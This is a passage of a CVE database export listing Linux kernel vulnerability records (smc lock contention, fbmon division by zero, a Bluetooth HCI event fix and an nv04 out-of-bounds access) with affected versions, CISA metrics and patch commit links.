held by syz-executor.2/12261:\n #0: ffffffff8f369610 (pernet_ops_rwsem){++++}-{3:3}, at: copy_net_ns+0x4c7/0x7b0 net/core/net_namespace.c:491\n #1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_create_pnetids_list net/smc/smc_pnet.c:809 [inline]\n #1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_net_init+0x10a/0x1e0 net/smc/smc_pnet.c:878\n2 locks held by syz-executor.0/12265:\n #0: ffffffff8f369610 (pernet_ops_rwsem){++++}-{3:3}, at: copy_net_ns+0x4c7/0x7b0 net/core/net_namespace.c:491\n #1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_create_pnetids_list net/smc/smc_pnet.c:809 [inline]\n #1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_net_init+0x10a/0x1e0 net/smc/smc_pnet.c:878\n2 locks held by syz-executor.3/12268:\n #0: ffffffff8f369610 (pernet_ops_rwsem){++++}-{3:3}, at: copy_net_ns+0x4c7/0x7b0 net/core/net_namespace.c:491\n #1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_create_pnetids_list net/smc/smc_pnet.c:809 [inline]\n #1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_net_init+0x10a/0x1e0 net/smc/smc_pnet.c:878\n2 locks held by syz-executor.4/12271:\n #0: ffffffff8f369610 (pernet_ops_rwsem){++++}-{3:3}, at: copy_net_ns+0x4c7/0x7b0 net/core/net_namespace.c:491\n #1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_create_pnetids_list net/smc/smc_pnet.c:809 [inline]\n #1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_net_init+0x10a/0x1e0 net/smc/smc_pnet.c:878\n2 locks held by syz-executor.1/12274:\n #0: ffffffff8f369610 (pernet_ops_rwsem){++++}-{3:3}, at: copy_net_ns+0x4c7/0x7b0 net/core/net_namespace.c:491\n #1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_create_pnetids_list net/smc/smc_pnet.c:809 [inline]\n #1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_net_init+0x10a/0x1e0 net/smc/smc_pnet.c:878\n2 locks held by syz-executor.2/12280:\n #0: ffffffff8f369610 (pernet_ops_rwsem){++++}-{3:3}, at: copy_net_ns+0x4c7/0x7b0 net/core/net_namespace.c:491\n #1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_create_pnetids_list net/smc/smc_pnet.c:809 [inline]\n #1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_net_init+0x10a/0x1e0 net/smc/smc_pnet.c:878"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:08:44.894Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/bc4d1ebca11b4f194e262326bd45938e857c59d2"
},
{
"url": "https://git.kernel.org/stable/c/b9117dc783c0ab0a3866812f70e07bf2ea071ac4"
},
{
"url": "https://git.kernel.org/stable/c/d7ee3bf0caf599c14db0bf4af7aacd6206ef8a23"
},
{
"url": "https://git.kernel.org/stable/c/a2e6bffc0388526ed10406040279a693d62b36ec"
},
{
"url": "https://git.kernel.org/stable/c/6e920422e7104928f760fc0e12b6d65ab097a2e7"
},
{
"url": "https://git.kernel.org/stable/c/00af2aa93b76b1bade471ad0d0525d4d29ca5cc0"
}
],
"title": "net/smc: reduce rtnl pressure in smc_pnet_create_pnetids_list()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35934",
"datePublished": "2024-05-19T10:10:41.668Z",
"dateReserved": "2024-05-17T13:50:33.130Z",
"dateUpdated": "2025-05-04T09:08:44.894Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35922 (GCVE-0-2024-35922)
Vulnerability from cvelistv5
Published
2024-05-19 10:10
Modified
2025-05-04 09:08
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
fbmon: prevent division by zero in fb_videomode_from_videomode()
The expression htotal * vtotal can have a zero value on
overflow. It is necessary to prevent division by zero like in
fb_var_to_videomode().
Found by Linux Verification Center (linuxtesting.org) with Svace.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35922",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-23T19:23:14.469241Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:34:25.984Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.909Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1fb52bc1de55e9e0bdf71fe078efd4da0889710f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/72d091b7515e0532ee015e144c906f3bcfdd6270"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/951838fee462aa01fa2a6a91d56f9a495082e7f0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/48d6bcfc31751ca2e753d901a2d82f27edf8a029"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/664206ff8b019bcd1e55b10b2eea3add8761b971"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3d4b909704bf2114f64f87363fa22b5ef8ac4a33"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1b107d637fed68a787da77a3514ad06e57abd0b4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c2d953276b8b27459baed1277a4fdd5dd9bd4126"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/video/fbdev/core/fbmon.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1fb52bc1de55e9e0bdf71fe078efd4da0889710f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "72d091b7515e0532ee015e144c906f3bcfdd6270",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "951838fee462aa01fa2a6a91d56f9a495082e7f0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "48d6bcfc31751ca2e753d901a2d82f27edf8a029",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "664206ff8b019bcd1e55b10b2eea3add8761b971",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3d4b909704bf2114f64f87363fa22b5ef8ac4a33",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1b107d637fed68a787da77a3514ad06e57abd0b4",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "c2d953276b8b27459baed1277a4fdd5dd9bd4126",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/video/fbdev/core/fbmon.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.155",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.86",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.155",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.86",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfbmon: prevent division by zero in fb_videomode_from_videomode()\n\nThe expression htotal * vtotal can have a zero value on\noverflow. It is necessary to prevent division by zero like in\nfb_var_to_videomode().\n\nFound by Linux Verification Center (linuxtesting.org) with Svace."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:08:27.194Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1fb52bc1de55e9e0bdf71fe078efd4da0889710f"
},
{
"url": "https://git.kernel.org/stable/c/72d091b7515e0532ee015e144c906f3bcfdd6270"
},
{
"url": "https://git.kernel.org/stable/c/951838fee462aa01fa2a6a91d56f9a495082e7f0"
},
{
"url": "https://git.kernel.org/stable/c/48d6bcfc31751ca2e753d901a2d82f27edf8a029"
},
{
"url": "https://git.kernel.org/stable/c/664206ff8b019bcd1e55b10b2eea3add8761b971"
},
{
"url": "https://git.kernel.org/stable/c/3d4b909704bf2114f64f87363fa22b5ef8ac4a33"
},
{
"url": "https://git.kernel.org/stable/c/1b107d637fed68a787da77a3514ad06e57abd0b4"
},
{
"url": "https://git.kernel.org/stable/c/c2d953276b8b27459baed1277a4fdd5dd9bd4126"
}
],
"title": "fbmon: prevent division by zero in fb_videomode_from_videomode()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35922",
"datePublished": "2024-05-19T10:10:33.703Z",
"dateReserved": "2024-05-17T13:50:33.124Z",
"dateUpdated": "2025-05-04T09:08:27.194Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27416 (GCVE-0-2024-27416)
Vulnerability from cvelistv5
Published
2024-05-17 11:51
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: hci_event: Fix handling of HCI_EV_IO_CAPA_REQUEST
If we received HCI_EV_IO_CAPA_REQUEST while
HCI_OP_READ_REMOTE_EXT_FEATURES is yet to be responded assume the remote
does support SSP since otherwise this event shouldn't be generated.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: ccb8618c972f941ebc6b2b9db491025b3369efcb Version: 1769ac55dbf3114d5bf79f11bd5dca80ee263f9c Version: 40a33a129d99639921ce00d274cca44ba282f1ac Version: 1ef071526848cc3109ade63268854cd7c20ece0c Version: 25e5d2883002e235f3378b8592aad14aeeef898c Version: c7f59461f5a78994613afc112cdd73688aef9076 Version: c7f59461f5a78994613afc112cdd73688aef9076 Version: c7f59461f5a78994613afc112cdd73688aef9076 Version: 2c7f9fda663a1b31a61744ffc456bdb89c4efc7f Version: 746dbb0fc6392eca23de27f8aa9d13979b564889 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27416",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-12T15:20:36.979047Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-12T15:20:51.306Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:34:52.342Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/afec8f772296dd8e5a2a6f83bbf99db1b9ca877f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/79820a7e1e057120c49be07cbe10643d0706b259"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/df193568d61234c81de7ed4d540c01975de60277"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c3df637266df29edee85e94cab5fd7041e5753ba"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/30a5e812f78e3d1cced90e1ed750bf027599205f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fba268ac36ab19f9763ff90d276cde0ce6cd5f31"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8e2758cc25891d2b76717aaf89b40ed215de188c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7e74aa53a68bf60f6019bd5d9a9a1406ec4d4865"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/bluetooth/hci_event.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "afec8f772296dd8e5a2a6f83bbf99db1b9ca877f",
"status": "affected",
"version": "ccb8618c972f941ebc6b2b9db491025b3369efcb",
"versionType": "git"
},
{
"lessThan": "79820a7e1e057120c49be07cbe10643d0706b259",
"status": "affected",
"version": "1769ac55dbf3114d5bf79f11bd5dca80ee263f9c",
"versionType": "git"
},
{
"lessThan": "df193568d61234c81de7ed4d540c01975de60277",
"status": "affected",
"version": "40a33a129d99639921ce00d274cca44ba282f1ac",
"versionType": "git"
},
{
"lessThan": "c3df637266df29edee85e94cab5fd7041e5753ba",
"status": "affected",
"version": "1ef071526848cc3109ade63268854cd7c20ece0c",
"versionType": "git"
},
{
"lessThan": "30a5e812f78e3d1cced90e1ed750bf027599205f",
"status": "affected",
"version": "25e5d2883002e235f3378b8592aad14aeeef898c",
"versionType": "git"
},
{
"lessThan": "fba268ac36ab19f9763ff90d276cde0ce6cd5f31",
"status": "affected",
"version": "c7f59461f5a78994613afc112cdd73688aef9076",
"versionType": "git"
},
{
"lessThan": "8e2758cc25891d2b76717aaf89b40ed215de188c",
"status": "affected",
"version": "c7f59461f5a78994613afc112cdd73688aef9076",
"versionType": "git"
},
{
"lessThan": "7e74aa53a68bf60f6019bd5d9a9a1406ec4d4865",
"status": "affected",
"version": "c7f59461f5a78994613afc112cdd73688aef9076",
"versionType": "git"
},
{
"status": "affected",
"version": "2c7f9fda663a1b31a61744ffc456bdb89c4efc7f",
"versionType": "git"
},
{
"status": "affected",
"version": "746dbb0fc6392eca23de27f8aa9d13979b564889",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/bluetooth/hci_event.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.6"
},
{
"lessThan": "6.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.309",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.271",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.212",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.151",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.81",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.21",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.309",
"versionStartIncluding": "4.19.297",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.271",
"versionStartIncluding": "5.4.259",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.212",
"versionStartIncluding": "5.10.199",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.151",
"versionStartIncluding": "5.15.137",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.81",
"versionStartIncluding": "6.1.60",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.21",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.9",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.328",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.5.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_event: Fix handling of HCI_EV_IO_CAPA_REQUEST\n\nIf we received HCI_EV_IO_CAPA_REQUEST while\nHCI_OP_READ_REMOTE_EXT_FEATURES is yet to be responded assume the remote\ndoes support SSP since otherwise this event shouldn\u0027t be generated."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:43.652Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/afec8f772296dd8e5a2a6f83bbf99db1b9ca877f"
},
{
"url": "https://git.kernel.org/stable/c/79820a7e1e057120c49be07cbe10643d0706b259"
},
{
"url": "https://git.kernel.org/stable/c/df193568d61234c81de7ed4d540c01975de60277"
},
{
"url": "https://git.kernel.org/stable/c/c3df637266df29edee85e94cab5fd7041e5753ba"
},
{
"url": "https://git.kernel.org/stable/c/30a5e812f78e3d1cced90e1ed750bf027599205f"
},
{
"url": "https://git.kernel.org/stable/c/fba268ac36ab19f9763ff90d276cde0ce6cd5f31"
},
{
"url": "https://git.kernel.org/stable/c/8e2758cc25891d2b76717aaf89b40ed215de188c"
},
{
"url": "https://git.kernel.org/stable/c/7e74aa53a68bf60f6019bd5d9a9a1406ec4d4865"
}
],
"title": "Bluetooth: hci_event: Fix handling of HCI_EV_IO_CAPA_REQUEST",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27416",
"datePublished": "2024-05-17T11:51:04.270Z",
"dateReserved": "2024-02-25T13:47:42.682Z",
"dateUpdated": "2025-05-04T12:55:43.652Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27008 (GCVE-0-2024-27008)
Vulnerability from cvelistv5
Published
2024-05-01 05:29
Modified
2025-11-04 17:16
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm: nv04: Fix out of bounds access
When Output Resource (dcb->or) value is assigned in
fabricate_dcb_output(), there may be out of bounds access to
dac_users array in case dcb->or is zero because ffs(dcb->or) is
used as index there.
The 'or' argument of fabricate_dcb_output() must be interpreted as a
number of bit to set, not value.
Utilize macros from 'enum nouveau_or' in calls instead of hardcoding.
Found by Linux Verification Center (linuxtesting.org) with SVACE.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 2e5702aff39532662198459726c624d5eadbdd78 Version: 2e5702aff39532662198459726c624d5eadbdd78 Version: 2e5702aff39532662198459726c624d5eadbdd78 Version: 2e5702aff39532662198459726c624d5eadbdd78 Version: 2e5702aff39532662198459726c624d5eadbdd78 Version: 2e5702aff39532662198459726c624d5eadbdd78 Version: 2e5702aff39532662198459726c624d5eadbdd78 Version: 2e5702aff39532662198459726c624d5eadbdd78 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27008",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-28T17:53:02.936582Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:46:47.615Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:16:46.306Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c2b97f26f081ceec3298151481687071075a25cb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5050ae879a828d752b439e3827aac126709da6d1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/097c7918fcfa1dee233acfd1f3029f00c3bc8062"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/df0991da7db846f7fa4ec6740350f743d3b69b04"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5fd4b090304e450aa0e7cc9cc2b4873285c6face"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6690cc2732e2a8d0eaca44dcbac032a4b0148042"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/26212da39ee14a52c76a202c6ae5153a84f579a5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cf92bb778eda7830e79452c6917efa8474a30c1e"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/nouveau/nouveau_bios.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c2b97f26f081ceec3298151481687071075a25cb",
"status": "affected",
"version": "2e5702aff39532662198459726c624d5eadbdd78",
"versionType": "git"
},
{
"lessThan": "5050ae879a828d752b439e3827aac126709da6d1",
"status": "affected",
"version": "2e5702aff39532662198459726c624d5eadbdd78",
"versionType": "git"
},
{
"lessThan": "097c7918fcfa1dee233acfd1f3029f00c3bc8062",
"status": "affected",
"version": "2e5702aff39532662198459726c624d5eadbdd78",
"versionType": "git"
},
{
"lessThan": "df0991da7db846f7fa4ec6740350f743d3b69b04",
"status": "affected",
"version": "2e5702aff39532662198459726c624d5eadbdd78",
"versionType": "git"
},
{
"lessThan": "5fd4b090304e450aa0e7cc9cc2b4873285c6face",
"status": "affected",
"version": "2e5702aff39532662198459726c624d5eadbdd78",
"versionType": "git"
},
{
"lessThan": "6690cc2732e2a8d0eaca44dcbac032a4b0148042",
"status": "affected",
"version": "2e5702aff39532662198459726c624d5eadbdd78",
"versionType": "git"
},
{
"lessThan": "26212da39ee14a52c76a202c6ae5153a84f579a5",
"status": "affected",
"version": "2e5702aff39532662198459726c624d5eadbdd78",
"versionType": "git"
},
{
"lessThan": "cf92bb778eda7830e79452c6917efa8474a30c1e",
"status": "affected",
"version": "2e5702aff39532662198459726c624d5eadbdd78",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/nouveau/nouveau_bios.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.38"
},
{
"lessThan": "2.6.38",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
